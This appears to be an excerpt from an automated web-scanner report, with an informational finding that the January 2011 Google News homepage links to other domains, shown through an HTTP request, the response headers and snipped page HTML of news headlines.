<div class="title"><a target="_blank" class="usg-AFQjCNGW2sFdZD4IVaRH_iTyOSw3pywQfQ " href="http://www.fool.com/investing/general/2011/01/21/the-outstanding-dividend-stock-im-buying-now.aspx" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNG6w3CBFiWdlpk6XJV7wVb5v5Ebzw " href="http://jalopnik.com/5739333/president-kennedys-ambulance-is-a-fake" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/ZfhFBl-goZk/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/ZfhFBl-goZk/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=ZfhFBl-goZk">Moscow Airport Attack Kills 35, Wounds 180</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=ZfhFBl-goZk">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/F3y6v2G97pg/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/F3y6v2G97pg/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=F3y6v2G97pg">NEED TO KNOW | The dogs are alright: The Vick dogs make a comeback <b>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=F3y6v2G97pg">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Sport Science: Devin Hester Vs. A Black Bear</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/CWAuaVf-QPI/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/CWAuaVf-QPI/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=CWAuaVf-QPI">How Severe Is Europe&#39;s Intertwined Debt Crisis?</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=CWAuaVf-QPI">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Domodedovo blast masterminds proud of terror &#39;fundraiser&#39; - Peter Lavelle</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEwNzQqdJM1IGgZz5gvrPXeNayR4Q " href="http://mashable.com/2011/01/24/the-history-of-social-media-infographic/" id="8884752361001821321"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHH_B8Vhlsac2V2jAPJyKDuyVeAAA " href="http://mashable.com/2011/01/24/engaging-facebook-fans/" id="-7258938783345423075"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHMWK2sO6xALZ8Noc1IU30kHMomlA " href="http://www.msnbc.msn.com/id/41241414/ns/us_news-wikileaks_in_security/" id="3347817467129831786"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFjUhx014npXqTl_gR5gFJBq02CSg " href="http://marquee.blogs.cnn.com/2011/01/24/oprahs-big-announcement/" id="3977728706156181977"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2LifoZ2DaEkfGjsc9kMMPnJB2kg " href="http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml" id="-7252428281190763667"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEPdEfqF2nkQ1qDcAFFpZusUDt9tA " href="http://www.reuters.com/article/idUSTRE70N2TQ20110124" id="5335316056229417362"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHqGxATg1fYo0u1F98uoyT5teTfkg " href="http://newsfeed.time.com/2011/01/24/faithful-facebook-pope-benedict-blesses-social-networking/" id="4107276558132002441"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGrXAJbJAfabV2P53NOL_xQOEdL7A " href="http://www.huffingtonpost.com/2011/01/24/rahm-emanuel-mayor-chicago_n_813126.html" id="2278659535596862927"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH9hhCvfvWIOxbh2PAr-0LpnBbUgw " href="http://today.msnbc.msn.com/id/41248994/ns/today-entertainment/" id="-7437864668343822492"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsz7_xejPP6VsD3NuWdHvxda40Kg " href="http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html" id="1375770744202528156"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEaqfRvY7dos0yZG31Guz8NVyfl7Q " href="http://www.huffingtonpost.com/2011/01/20/hundreds-of-dead-birds-in_n_811709.html" id="-7920089245397278610"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEQX0__xR6F03eNBD80wQ9ztviVrQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html" id="6905605053023830163"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIqQNaGnqPT81jx2kLrr0Da_XsHg " href="http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln" id="6107526647097459892"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="7279004896616451596"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHMWK2sO6xALZ8Noc1IU30kHMomlA " href="http://www.msnbc.msn.com/id/41241414/ns/us_news-wikileaks_in_security/" id="3347817467129831786"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHmXxgsr2Peqa9XqIE5wJgWC0cf0w " href="http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162" id="-8119849514259291457"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHGoSTKljD7CPe2BKYwtlGd4w2MIw " href="http://bits.blogs.nytimes.com/2011/01/18/now-at-starbucks-buy-a-latte-by-waving-your-phone/" id="-6291714702642255726"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE6ybBw84x9uoypftV5tngJHzOltg " href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/" id="6382990014983290027"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGguw_7ImLDpzcb2GdQY0b690KAjA " href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html" id="6034302388163933602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG31ieJjehuVhbmm8A6VoEwB34ufg " href="http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/" id="-5002562622630809801"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEBCqmXL7Go4fAtoGveE-Ftib_JTA " href="http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html" id="5830623823895293286"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHctKe5Y-WBhY6hGZFBttgAQRB3-Q " href="http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/" id="1409758142476247527"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEkadxsOjF3ACMoM7ayuBEhtjIiRw " href="http://www.wired.com/threatlevel/2011/01/twitter/" id="-198025857784313602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFyXWaX3UnCdLqv5YPYdbvsndnWkg " href="http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages" id="-2612389445387481788"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHcVMhnzzMyCpJmDU1cPVagYhNUlw " href="http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" id="7471793345502520458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGHvrAgHhdbQ23w7k0W6bDzY8Wb_Q " href="http://www.nytimes.com/2011/01/05/education/05tablets.html" id="-6175099262534847598"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEEMnWgLvAeICGYU6qhmMbZdYLsAA " href="http://tv.gawker.com/5735192/watch-ricky-gervais-extremely-uncomfortable-golden-globes-monologue" id="3436666136491683511"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

20.110. http://news.google.com/nwshp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /nwshp

Issue detail

The page was loaded from a URL containing a query string:
  • http://news.google.com/nwshp?hl=en&tab=wn
The response contains the following links to other domains:

Request

GET /nwshp?hl=en&tab=wn HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=qDXEt69AwgvdXC6l079_jhP-tOanccyEpdjE53HnJG9UsdjQXTKiiwDpOH_RQ7VPxt6loxW-owIeszPBWIZfbI7cevhX2bGfeLrA1_XLgTnGIuB9Oef9LAbXFE9IVa9G;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:05 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:05 GMT
Expires: Mon, 24 Jan 2011 22:43:05 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;topic=h&amp;num=3&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ " title="MiamiHerald.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/naj4TdD_2Xxs5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ "> MiamiHerald... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHqZ10lt7cdruXfdH1xAs6ct4QZGw " href="http://www.miamiherald.com/2011/01/24/2031135/slain-officers-funeral-procession.html?asset_id=Funeral%20procession%20for%20slain%20Miami-Dade%20officers&amp;asset_type=html_module" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://pheedo.msnbc.msn.com/click.phdo?i=ece7dfeabc52f4bea351b7e1dc14b312" target="_blank" class="usg-AFQjCNEPSe4_zvoHTNDJhVHgzRITYChnow " id="MAA4AEgAUAFgAmoCdXM">Police fear &#39;war on cops&#39; after 11 shootings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102430334731152.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNFKWTNERTBMgyBF7SF1954uIaH-5Q " id="MAA4AEgAUAJgAmoCdXM">Photos of the Day</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N64B20110124" class="usg-AFQjCNGKvU8a77RAbuHq71cn0BfubOqx1A " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/rBoIUSjhqHkkUM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N64B20110124" class="usg-AFQjCNGKvU8a77RAbuHq71cn0BfubOqx1A "> Reuters </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNEfe_UP9nwyItWlPbxKT7Wck8XZfQ " href="http://www.cbsnews.com/8301-503544_162-20029390-503544.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2419720820110124" target="_blank" class="usg-AFQjCNH3n7EELgrOBKKQkV-SndbKEp88kw " id="MAA4AEgBUAFgAmoCdXM">US spending battle looms over Obama speech</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.npr.org/2011/01/24/133188100/new-state-of-the-union-question-found-a-date-yet" target="_blank" class="usg-AFQjCNEfyBgEIPRUrTW6Q5mQtZgGGHMGoQ " id="MAA4AEgBUAJgAmoCdXM">New State Of The Union Question: Found A Date Yet?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHnD8jGZ4-b7iXuMygTSS1YJAV5Iw " href="http://www.bloomberg.com/news/2011-01-22/obama-to-stress-competitiveness-job-creation-deficit-reduction-in-speech.html" id="MAA4AEgBUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHLfCBkbcqp8Q2u9jdOB6Se50Mnsw " href="http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH6o7vAlZ2pKf36F4XR66a0t_JnNQ " href="http://voices.washingtonpost.com/goingoutgurus/2011/01/where_to_watch_the_state_of_th.html" id="MAA4AEgBUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ " title="The Guardian"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sF9Yx43EuUfcmM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ "> The Guardia... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHSXYfXliztkaNWmpZ7jjwek16gxA " href="http://en.rian.ru/russia/20110125/162282705.html" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=90gldve1V1g">Video:&nbsp;
Medvedev delays Davos trip over 'barbaric' Domodedovo tragedy
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUS198178545820110124" target="_blank" class="usg-AFQjCNGSAB-m5iwTzxGnMuGS88QYOM7ySw " id="MAA4AEgCUAFgAmoCdXM">Breaking News: At Least 35 Dead, 150 Injured in Moscow Airport Explosion</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHWvc5HbfGnAvgPIeDY6BBRSXxwug " href="http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHA0iKAZItKHA9EroIoCjTNS4ph1A " href="http://www.msnbc.msn.com/id/41238598/ns/world_news-europe/" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFNSZmNow3mU5fl-5uIhKylIg8xhw " href="http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf" id="MAA4AEgCUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG86xUGIkzfiauYZ7t_EAM4mQLkiA " href="http://www.guardian.co.uk/world/2011/jan/24/moscow-airport-bomb-kills-dozens" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA " title="CBC.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/qMklKOy43j6_5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEhLfkwP3KHv_AxKWphB2eFXVLo4w " href="http://www.people.com/people/article/0,,20460315,00.html" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=1wbQ-zmLKqg">Video:&nbsp;
Oprah Reveals Her Big Family Secret
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://chicago.gopride.com/news/article.cfm/articleid/16138036" target="_blank" class="usg-AFQjCNHLM73pKjVmbSYzUIkwM-YRizRjZA " id="MAA4AEgDUAFgAmoCdXM">Oprah&#39;s Big Secret: Ooooo or zzzzzz?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHu4Y7lCPXQJ2lc2u8sbaHH6Tfs7w " href="http://www.businessinsider.com/wow-how-oprahs-half-sister-discovered-they-were-related-2011-1" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIUkZzAs9Y61wWQ3duZpRqiJx8Gg " href="http://popwatch.ew.com/2011/01/24/oprah-half-sister-family-secret/" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF4hVZx0KyfMaR7DUadFRt5fLq5aA " href="http://theweek.com/article/index/211389/oprahs-half-sister-revelation-a-publicity-stunt" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8lkOCVmQaNBIQdhaM5ui-PusAEw " href="http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html" class="usg-AFQjCNHO68tPIt-RIKvL2eDyHIRPQpqkXA " title="CBC.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/7106jCsR-SIHYM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html" class="usg-AFQjCNHO68tPIt-RIKvL2eDyHIRPQpqkXA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNExCKBurSTO2CpunscBMXRB8AS8rg " href="http://sportsillustrated.cnn.com/2011/writers/paul_daugherty/01/24/jay.cutler/" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://sports.espn.go.com/chicago/nfl/news/story?id=6054809" target="_blank" class="usg-AFQjCNGOcyfxN0x_yhl1C7G2kN9X2Uvebw " id="MAA4AEgEUAFgAmoCdXM">A closer look at Jay Cutler&#39;s knee injury</a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1" target="_blank" class="usg-AFQjCNHjzljR480WHVLDV2GFli4gPC1ywg " id="MAA4AEgEUAJgAmoCdXM">Duke&#39;s Coach K says Chicago Bears QB Jay Cutler should support team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGk8jkGEv1Mwau1rxJflyTxLLTyLQ " href="http://www.chicagobreakingsports.com/2011/01/bears-cutler-suffers-sprain-of-mcl-in-left-knee.html" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhT_d3vHMRaBJkdkY1C3b7vZZrJg " href="http://profootballtalk.nbcsports.com/2011/01/24/final-cutler-injury-update-grade-ii-mcl-tear/" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
